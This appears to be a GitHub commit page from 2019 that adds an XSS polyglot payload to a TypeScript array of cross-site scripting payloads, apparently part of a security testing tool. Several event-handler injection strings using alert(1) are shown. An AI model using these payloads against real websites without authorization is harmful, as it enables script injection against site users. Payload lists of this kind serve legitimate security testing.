Skip to content

Commit

Permalink
Added xss polyglot payload
Browse files Browse the repository at this point in the history
  • Loading branch information
antonioCoco committed May 30, 2019
1 parent 60902e7 commit f067bc6
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions src/lib/payloads.ts
Original file line number Diff line number Diff line change
Expand Up @@ -43,4 +43,5 @@ export const PAYLOADS = [
`<video onloadstart=alert(1)><source>`,
`<input autofocus onblur=alert(1)>`,
`<keygen autofocus onfocus=alert(1)>`,
`jaVasCript:/*-/*\`/*\\\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e`,
]

0 comments on commit f067bc6

Please sign in to comment.